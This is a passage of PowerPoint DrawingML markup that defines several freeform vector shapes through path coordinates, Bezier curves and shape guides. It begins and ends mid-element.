                    <a:gd name="T54" fmla="*/ 38 w 57"/>
                    <a:gd name="T55" fmla="*/ 56 h 61"/>
                    <a:gd name="T56" fmla="*/ 46 w 57"/>
                    <a:gd name="T57" fmla="*/ 54 h 61"/>
                    <a:gd name="T58" fmla="*/ 46 w 57"/>
                    <a:gd name="T59" fmla="*/ 54 h 61"/>
                    <a:gd name="T60" fmla="*/ 46 w 57"/>
                    <a:gd name="T61" fmla="*/ 54 h 61"/>
                    <a:gd name="T62" fmla="*/ 51 w 57"/>
                    <a:gd name="T63" fmla="*/ 41 h 61"/>
                    <a:gd name="T64" fmla="*/ 51 w 57"/>
                    <a:gd name="T65" fmla="*/ 41 h 61"/>
                    <a:gd name="T66" fmla="*/ 43 w 57"/>
                    <a:gd name="T67" fmla="*/ 19 h 61"/>
                    <a:gd name="T68" fmla="*/ 43 w 57"/>
                    <a:gd name="T69" fmla="*/ 19 h 61"/>
                    <a:gd name="T70" fmla="*/ 20 w 57"/>
                    <a:gd name="T71" fmla="*/ 5 h 61"/>
                    <a:gd name="T72" fmla="*/ 20 w 57"/>
                    <a:gd name="T73" fmla="*/ 5 h 61"/>
                    <a:gd name="T74" fmla="*/ 20 w 57"/>
                    <a:gd name="T75" fmla="*/ 5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57" h="61">
                      <a:moveTo>
                        <a:pt x="38" y="61"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="61"/>
                        <a:pt x="17" y="55"/>
                        <a:pt x="9" y="45"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="45"/>
                        <a:pt x="9" y="45"/>
                        <a:pt x="9" y="45"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="37"/>
                        <a:pt x="0" y="29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0" y="14"/>
                        <a:pt x="3" y="8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11" y="1"/>
                        <a:pt x="15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9" y="0"/>
                        <a:pt x="40" y="6"/>
                        <a:pt x="48" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="16"/>
                        <a:pt x="48" y="16"/>
                        <a:pt x="48" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="24"/>
                        <a:pt x="57" y="33"/>
                        <a:pt x="57" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="57" y="41"/>
                        <a:pt x="57" y="41"/>
                        <a:pt x="57" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="57" y="47"/>
                        <a:pt x="54" y="54"/>
                        <a:pt x="49" y="58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46" y="60"/>
                        <a:pt x="42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lose/>
                      <a:moveTo>
                        <a:pt x="20" y="5"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="5"/>
                        <a:pt x="14" y="6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8" y="11"/>
                        <a:pt x="6" y="15"/>
                        <a:pt x="6" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="21"/>
                        <a:pt x="6" y="21"/>
                        <a:pt x="6" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="27"/>
                        <a:pt x="8" y="35"/>
                        <a:pt x="14" y="42"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="42"/>
                        <a:pt x="14" y="42"/>
                        <a:pt x="14" y="42"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="51"/>
                        <a:pt x="30" y="56"/>
                        <a:pt x="38" y="56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41" y="56"/>
                        <a:pt x="44" y="55"/>
                        <a:pt x="46" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="54"/>
                        <a:pt x="46" y="54"/>
                        <a:pt x="46" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="54"/>
                        <a:pt x="46" y="54"/>
                        <a:pt x="46" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="51"/>
                        <a:pt x="51" y="46"/>
                        <a:pt x="51" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="41"/>
                        <a:pt x="51" y="41"/>
                        <a:pt x="51" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="34"/>
                        <a:pt x="49" y="26"/>
                        <a:pt x="43" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="19"/>
                        <a:pt x="43" y="19"/>
                        <a:pt x="43" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="37" y="10"/>
                        <a:pt x="27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15" name="Freeform 507">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDEC6813-0BA9-4204-8EE4-EE36F6ACE2A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784" y="2958"/>
                  <a:ext cx="565" cy="444"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 565"/>
                    <a:gd name="T1" fmla="*/ 115 h 444"/>
                    <a:gd name="T2" fmla="*/ 10 w 565"/>
                    <a:gd name="T3" fmla="*/ 111 h 444"/>
                    <a:gd name="T4" fmla="*/ 147 w 565"/>
                    <a:gd name="T5" fmla="*/ 429 h 444"/>
                    <a:gd name="T6" fmla="*/ 548 w 565"/>
                    <a:gd name="T7" fmla="*/ 321 h 444"/>
                    <a:gd name="T8" fmla="*/ 414 w 565"/>
                    <a:gd name="T9" fmla="*/ 4 h 444"/>
                    <a:gd name="T10" fmla="*/ 425 w 565"/>
                    <a:gd name="T11" fmla="*/ 0 h 444"/>
                    <a:gd name="T12" fmla="*/ 565 w 565"/>
                    <a:gd name="T13" fmla="*/ 328 h 444"/>
                    <a:gd name="T14" fmla="*/ 140 w 565"/>
                    <a:gd name="T15" fmla="*/ 444 h 444"/>
                    <a:gd name="T16" fmla="*/ 0 w 565"/>
                    <a:gd name="T17" fmla="*/ 115 h 444"/>
                    <a:gd name="T18" fmla="*/ 0 w 565"/>
                    <a:gd name="T19" fmla="*/ 115 h 4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65" h="444">
                      <a:moveTo>
                        <a:pt x="0" y="115"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="10" y="111"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="429"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="548" y="321"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="414" y="4"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="425" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="565" y="328"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="140" y="444"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1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16" name="Freeform 508">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91E83B63-3920-4981-BAA4-8697431629F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843" y="2995"/>
                  <a:ext cx="581" cy="664"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 144 w 581"/>
                    <a:gd name="T1" fmla="*/ 111 h 664"/>
                    <a:gd name="T2" fmla="*/ 166 w 581"/>
                    <a:gd name="T3" fmla="*/ 116 h 664"/>
                    <a:gd name="T4" fmla="*/ 33 w 581"/>
                    <a:gd name="T5" fmla="*/ 631 h 664"/>
                    <a:gd name="T6" fmla="*/ 423 w 581"/>
                    <a:gd name="T7" fmla="*/ 527 h 664"/>
                    <a:gd name="T8" fmla="*/ 558 w 581"/>
                    <a:gd name="T9" fmla="*/ 0 h 664"/>
                    <a:gd name="T10" fmla="*/ 581 w 581"/>
                    <a:gd name="T11" fmla="*/ 5 h 664"/>
                    <a:gd name="T12" fmla="*/ 442 w 581"/>
                    <a:gd name="T13" fmla="*/ 546 h 664"/>
                    <a:gd name="T14" fmla="*/ 0 w 581"/>
                    <a:gd name="T15" fmla="*/ 664 h 664"/>
                    <a:gd name="T16" fmla="*/ 144 w 581"/>
                    <a:gd name="T17" fmla="*/ 111 h 664"/>
                    <a:gd name="T18" fmla="*/ 144 w 581"/>
                    <a:gd name="T19" fmla="*/ 111 h 6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81" h="664">
                      <a:moveTo>
                        <a:pt x="144" y="111"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="166" y="116"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33" y="631"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="423" y="527"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="558" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="581" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="442" y="546"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="664"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="144" y="111"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="144" y="1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17" name="Freeform 509">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03D0E081-C968-49DB-AE33-72DDB1BE47E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794" y="3567"/>
                  <a:ext cx="132" cy="151"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 47 w 56"/>
                    <a:gd name="T1" fmla="*/ 57 h 64"/>
                    <a:gd name="T2" fmla="*/ 11 w 56"/>
                    <a:gd name="T3" fmla="*/ 45 h 64"/>
                    <a:gd name="T4" fmla="*/ 9 w 56"/>
                    <a:gd name="T5" fmla="*/ 7 h 64"/>
                    <a:gd name="T6" fmla="*/ 45 w 56"/>
                    <a:gd name="T7" fmla="*/ 19 h 64"/>
                    <a:gd name="T8" fmla="*/ 47 w 56"/>
                    <a:gd name="T9" fmla="*/ 57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64">
                      <a:moveTo>
                        <a:pt x="47" y="57"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="64"/>
                        <a:pt x="22" y="58"/>
                        <a:pt x="11" y="45"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="31"/>
                        <a:pt x="0" y="14"/>
                        <a:pt x="9" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="0"/>
                        <a:pt x="35" y="5"/>
                        <a:pt x="45" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="33"/>
                        <a:pt x="56" y="50"/>
                        <a:pt x="47" y="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18" name="Freeform 510">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51A803C1-5442-47BA-8108-F2634F00FA96}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="16794" y="3569"/>
                  <a:ext cx="132" cy="147"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 37 w 56"/>
                    <a:gd name="T1" fmla="*/ 62 h 62"/>
                    <a:gd name="T2" fmla="*/ 9 w 56"/>
                    <a:gd name="T3" fmla="*/ 45 h 62"/>
                    <a:gd name="T4" fmla="*/ 9 w 56"/>
                    <a:gd name="T5" fmla="*/ 45 h 62"/>
                    <a:gd name="T6" fmla="*/ 0 w 56"/>
                    <a:gd name="T7" fmla="*/ 21 h 62"/>
                    <a:gd name="T8" fmla="*/ 0 w 56"/>
                    <a:gd name="T9" fmla="*/ 21 h 62"/>
                    <a:gd name="T10" fmla="*/ 7 w 56"/>
                    <a:gd name="T11" fmla="*/ 4 h 62"/>
                    <a:gd name="T12" fmla="*/ 7 w 56"/>
                    <a:gd name="T13" fmla="*/ 4 h 62"/>
                    <a:gd name="T14" fmla="*/ 19 w 56"/>
                    <a:gd name="T15" fmla="*/ 0 h 62"/>
                    <a:gd name="T16" fmla="*/ 19 w 56"/>
                    <a:gd name="T17" fmla="*/ 0 h 62"/>
                    <a:gd name="T18" fmla="*/ 47 w 56"/>
                    <a:gd name="T19" fmla="*/ 16 h 62"/>
                    <a:gd name="T20" fmla="*/ 47 w 56"/>
                    <a:gd name="T21" fmla="*/ 16 h 62"/>
                    <a:gd name="T22" fmla="*/ 56 w 56"/>
                    <a:gd name="T23" fmla="*/ 41 h 62"/>
                    <a:gd name="T24" fmla="*/ 56 w 56"/>
                    <a:gd name="T25" fmla="*/ 41 h 62"/>
                    <a:gd name="T26" fmla="*/ 49 w 56"/>
                    <a:gd name="T27" fmla="*/ 58 h 62"/>
                    <a:gd name="T28" fmla="*/ 49 w 56"/>
                    <a:gd name="T29" fmla="*/ 58 h 62"/>
                    <a:gd name="T30" fmla="*/ 49 w 56"/>
                    <a:gd name="T31" fmla="*/ 58 h 62"/>
                    <a:gd name="T32" fmla="*/ 37 w 56"/>
                    <a:gd name="T33" fmla="*/ 62 h 62"/>
                    <a:gd name="T34" fmla="*/ 37 w 56"/>
                    <a:gd name="T35" fmla="*/ 62 h 62"/>
                    <a:gd name="T36" fmla="*/ 37 w 56"/>
                    <a:gd name="T37" fmla="*/ 62 h 62"/>
                    <a:gd name="T38" fmla="*/ 19 w 56"/>
                    <a:gd name="T39" fmla="*/ 5 h 62"/>
                    <a:gd name="T40" fmla="*/ 11 w 56"/>
                    <a:gd name="T41" fmla="*/ 8 h 62"/>
                    <a:gd name="T42" fmla="*/ 11 w 56"/>
                    <a:gd name="T43" fmla="*/ 8 h 62"/>
                    <a:gd name="T44" fmla="*/ 5 w 56"/>
                    <a:gd name="T45" fmla="*/ 21 h 62"/>
                    <a:gd name="T46" fmla="*/ 5 w 56"/>
                    <a:gd name="T47" fmla="*/ 21 h 62"/>
                    <a:gd name="T48" fmla="*/ 13 w 56"/>
                    <a:gd name="T49" fmla="*/ 42 h 62"/>
                    <a:gd name="T50" fmla="*/ 13 w 56"/>
                    <a:gd name="T51" fmla="*/ 42 h 62"/>
                    <a:gd name="T52" fmla="*/ 37 w 56"/>
                    <a:gd name="T53" fmla="*/ 56 h 62"/>
                    <a:gd name="T54" fmla="*/ 37 w 56"/>
                    <a:gd name="T55" fmla="*/ 56 h 62"/>
                    <a:gd name="T56" fmla="*/ 45 w 56"/>
                    <a:gd name="T57" fmla="*/ 54 h 62"/>
                    <a:gd name="T58" fmla="*/ 45 w 56"/>
                    <a:gd name="T59" fmla="*/ 54 h 62"/>
                    <a:gd name="T60" fmla="*/ 45 w 56"/>
                    <a:gd name="T61" fmla="*/ 54 h 62"/>
                    <a:gd name="T62" fmla="*/ 51 w 56"/>
                    <a:gd name="T63" fmla="*/ 41 h 62"/>
                    <a:gd name="T64" fmla="*/ 51 w 56"/>
                    <a:gd name="T65" fmla="*/ 41 h 62"/>
                    <a:gd name="T66" fmla="*/ 43 w 56"/>
                    <a:gd name="T67" fmla="*/ 20 h 62"/>
                    <a:gd name="T68" fmla="*/ 43 w 56"/>
                    <a:gd name="T69" fmla="*/ 20 h 62"/>
                    <a:gd name="T70" fmla="*/ 19 w 56"/>
                    <a:gd name="T71" fmla="*/ 5 h 62"/>
                    <a:gd name="T72" fmla="*/ 19 w 56"/>
                    <a:gd name="T73" fmla="*/ 5 h 62"/>
                    <a:gd name="T74" fmla="*/ 19 w 56"/>
                    <a:gd name="T75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56" h="62">
                      <a:moveTo>
                        <a:pt x="37" y="62"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="61"/>
                        <a:pt x="17" y="55"/>
                        <a:pt x="9" y="45"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="45"/>
                        <a:pt x="9" y="45"/>
                        <a:pt x="9" y="45"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="37"/>
                        <a:pt x="0" y="29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0" y="14"/>
                        <a:pt x="2" y="8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11" y="1"/>
                        <a:pt x="15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29" y="0"/>
                        <a:pt x="39" y="6"/>
                        <a:pt x="47" y="16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53" y="24"/>
                        <a:pt x="56" y="33"/>
                        <a:pt x="56" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="41"/>
                        <a:pt x="56" y="41"/>
                        <a:pt x="56" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="48"/>
                        <a:pt x="54" y="54"/>
                        <a:pt x="49" y="58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45" y="60"/>
                        <a:pt x="41" y="62"/>
                        <a:pt x="37" y="62"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="37" y="62"/>
                        <a:pt x="37" y="62"/>
                        <a:pt x="37" y="62"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="37" y="62"/>
                        <a:pt x="37" y="62"/>
                        <a:pt x="37" y="62"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="19" y="5"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="5"/>
                        <a:pt x="13" y="6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7" y="11"/>
                        <a:pt x="5" y="15"/>
                        <a:pt x="5" y="21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5" y="27"/>
                        <a:pt x="8" y="35"/>
                        <a:pt x="13" y="42"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="42"/>
                        <a:pt x="13" y="42"/>
                        <a:pt x="13" y="42"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="51"/>
                        <a:pt x="30" y="56"/>
                        <a:pt x="37" y="56"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="37" y="56"/>
                        <a:pt x="37" y="56"/>
                        <a:pt x="37" y="56"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="56"/>
                        <a:pt x="43" y="55"/>
                        <a:pt x="45" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="54"/>
                        <a:pt x="45" y="54"/>
                        <a:pt x="45" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="54"/>
                        <a:pt x="45" y="54"/>
                        <a:pt x="45" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="51"/>
                        <a:pt x="51" y="46"/>
                        <a:pt x="51" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="41"/>
                        <a:pt x="51" y="41"/>
                        <a:pt x="51" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="34"/>
                        <a:pt x="48" y="26"/>
                        <a:pt x="43" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="20"/>
                        <a:pt x="43" y="20"/>
                        <a:pt x="43" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="10"/>
                        <a:pt x="27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19" name="Freeform 511">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5D2835C-1E21-439B-AA1D-B56F062EFCB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7942" y="3652"/>
                  <a:ext cx="134" cy="151"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 48 w 57"/>
                    <a:gd name="T1" fmla="*/ 57 h 64"/>
                    <a:gd name="T2" fmla="*/ 12 w 57"/>
                    <a:gd name="T3" fmla="*/ 45 h 64"/>
                    <a:gd name="T4" fmla="*/ 10 w 57"/>
                    <a:gd name="T5" fmla="*/ 7 h 64"/>
                    <a:gd name="T6" fmla="*/ 46 w 57"/>
                    <a:gd name="T7" fmla="*/ 19 h 64"/>
                    <a:gd name="T8" fmla="*/ 48 w 57"/>
                    <a:gd name="T9" fmla="*/ 57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64">
                      <a:moveTo>
                        <a:pt x="48" y="57"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="64"/>
                        <a:pt x="22" y="59"/>
                        <a:pt x="12" y="45"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="31"/>
                        <a:pt x="0" y="14"/>
                        <a:pt x="10" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="0"/>
                        <a:pt x="35" y="6"/>
                        <a:pt x="46" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="33"/>
                        <a:pt x="57" y="50"/>
                        <a:pt x="48" y="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20" name="Freeform 512">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4442FFE9-E951-44A4-9225-219E90343447}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="17944" y="3654"/>
                  <a:ext cx="132" cy="147"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 37 w 56"/>
                    <a:gd name="T1" fmla="*/ 62 h 62"/>
                    <a:gd name="T2" fmla="*/ 9 w 56"/>
                    <a:gd name="T3" fmla="*/ 46 h 62"/>
                    <a:gd name="T4" fmla="*/ 9 w 56"/>
                    <a:gd name="T5" fmla="*/ 46 h 62"/>
                    <a:gd name="T6" fmla="*/ 0 w 56"/>
                    <a:gd name="T7" fmla="*/ 21 h 62"/>
                    <a:gd name="T8" fmla="*/ 0 w 56"/>
                    <a:gd name="T9" fmla="*/ 21 h 62"/>
                    <a:gd name="T10" fmla="*/ 7 w 56"/>
                    <a:gd name="T11" fmla="*/ 4 h 62"/>
                    <a:gd name="T12" fmla="*/ 7 w 56"/>
                    <a:gd name="T13" fmla="*/ 4 h 62"/>
                    <a:gd name="T14" fmla="*/ 19 w 56"/>
                    <a:gd name="T15" fmla="*/ 0 h 62"/>
                    <a:gd name="T16" fmla="*/ 19 w 56"/>
                    <a:gd name="T17" fmla="*/ 0 h 62"/>
                    <a:gd name="T18" fmla="*/ 47 w 56"/>
                    <a:gd name="T19" fmla="*/ 17 h 62"/>
                    <a:gd name="T20" fmla="*/ 47 w 56"/>
                    <a:gd name="T21" fmla="*/ 17 h 62"/>
                    <a:gd name="T22" fmla="*/ 56 w 56"/>
                    <a:gd name="T23" fmla="*/ 41 h 62"/>
                    <a:gd name="T24" fmla="*/ 56 w 56"/>
                    <a:gd name="T25" fmla="*/ 41 h 62"/>
                    <a:gd name="T26" fmla="*/ 48 w 56"/>
                    <a:gd name="T27" fmla="*/ 58 h 62"/>
                    <a:gd name="T28" fmla="*/ 48 w 56"/>
                    <a:gd name="T29" fmla="*/ 58 h 62"/>
                    <a:gd name="T30" fmla="*/ 48 w 56"/>
                    <a:gd name="T31" fmla="*/ 58 h 62"/>
                    <a:gd name="T32" fmla="*/ 37 w 56"/>
                    <a:gd name="T33" fmla="*/ 62 h 62"/>
                    <a:gd name="T34" fmla="*/ 37 w 56"/>
                    <a:gd name="T35" fmla="*/ 62 h 62"/>
                    <a:gd name="T36" fmla="*/ 37 w 56"/>
                    <a:gd name="T37" fmla="*/ 62 h 62"/>
                    <a:gd name="T38" fmla="*/ 19 w 56"/>
                    <a:gd name="T39" fmla="*/ 6 h 62"/>
                    <a:gd name="T40" fmla="*/ 10 w 56"/>
                    <a:gd name="T41" fmla="*/ 8 h 62"/>
                    <a:gd name="T42" fmla="*/ 10 w 56"/>
                    <a:gd name="T43" fmla="*/ 8 h 62"/>
                    <a:gd name="T44" fmla="*/ 5 w 56"/>
                    <a:gd name="T45" fmla="*/ 21 h 62"/>
                    <a:gd name="T46" fmla="*/ 5 w 56"/>
                    <a:gd name="T47" fmla="*/ 21 h 62"/>
                    <a:gd name="T48" fmla="*/ 13 w 56"/>
                    <a:gd name="T49" fmla="*/ 42 h 62"/>
                    <a:gd name="T50" fmla="*/ 13 w 56"/>
                    <a:gd name="T51" fmla="*/ 42 h 62"/>
                    <a:gd name="T52" fmla="*/ 37 w 56"/>
                    <a:gd name="T53" fmla="*/ 57 h 62"/>
                    <a:gd name="T54" fmla="*/ 37 w 56"/>
                    <a:gd name="T55" fmla="*/ 57 h 62"/>
                    <a:gd name="T56" fmla="*/ 45 w 56"/>
                    <a:gd name="T57" fmla="*/ 54 h 62"/>
                    <a:gd name="T58" fmla="*/ 45 w 56"/>
                    <a:gd name="T59" fmla="*/ 54 h 62"/>
                    <a:gd name="T60" fmla="*/ 45 w 56"/>
                    <a:gd name="T61" fmla="*/ 54 h 62"/>
                    <a:gd name="T62" fmla="*/ 51 w 56"/>
                    <a:gd name="T63" fmla="*/ 41 h 62"/>
                    <a:gd name="T64" fmla="*/ 51 w 56"/>
                    <a:gd name="T65" fmla="*/ 41 h 62"/>
                    <a:gd name="T66" fmla="*/ 43 w 56"/>
                    <a:gd name="T67" fmla="*/ 20 h 62"/>
                    <a:gd name="T68" fmla="*/ 43 w 56"/>
                    <a:gd name="T69" fmla="*/ 20 h 62"/>
                    <a:gd name="T70" fmla="*/ 19 w 56"/>
                    <a:gd name="T71" fmla="*/ 6 h 62"/>
                    <a:gd name="T72" fmla="*/ 19 w 56"/>
                    <a:gd name="T73" fmla="*/ 6 h 62"/>
                    <a:gd name="T74" fmla="*/ 19 w 56"/>
                    <a:gd name="T75" fmla="*/ 6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56" h="62">
                      <a:moveTo>
                        <a:pt x="37" y="62"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="62"/>
                        <a:pt x="16" y="5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3" y="38"/>
                        <a:pt x="0" y="29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0" y="14"/>
                        <a:pt x="2" y="8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11" y="2"/>
                        <a:pt x="15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28" y="0"/>
                        <a:pt x="39" y="6"/>
                        <a:pt x="47" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="47" y="17"/>
                        <a:pt x="47" y="17"/>
                        <a:pt x="47" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="24"/>
                        <a:pt x="56" y="33"/>
                        <a:pt x="56" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="41"/>
                        <a:pt x="56" y="41"/>
                        <a:pt x="56" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="48"/>
                        <a:pt x="53" y="54"/>
                        <a:pt x="48" y="58"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="58"/>
                        <a:pt x="48" y="58"/>
                        <a:pt x="48" y="58"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="58"/>
                        <a:pt x="48" y="58"/>
                        <a:pt x="48" y="58"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="61"/>
                        <a:pt x="41" y="62"/>
                        <a:pt x="37" y="62"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="37" y="62"/>
                        <a:pt x="37" y="62"/>
                        <a:pt x="37" y="62"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="37" y="62"/>
                        <a:pt x="37" y="62"/>
                        <a:pt x="37" y="62"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="19" y="6"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="6"/>
                        <a:pt x="13" y="7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7" y="11"/>
                        <a:pt x="5" y="16"/>
                        <a:pt x="5" y="21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5" y="28"/>
                        <a:pt x="8" y="36"/>
                        <a:pt x="13" y="42"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="42"/>
                        <a:pt x="13" y="42"/>
                        <a:pt x="13" y="42"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="52"/>
                        <a:pt x="29" y="57"/>
                        <a:pt x="37" y="57"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="37" y="57"/>
                        <a:pt x="37" y="57"/>
                        <a:pt x="37" y="57"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="57"/>
                        <a:pt x="43" y="56"/>
                        <a:pt x="45" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="54"/>
                        <a:pt x="45" y="54"/>
                        <a:pt x="45" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="54"/>
                        <a:pt x="45" y="54"/>
                        <a:pt x="45" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
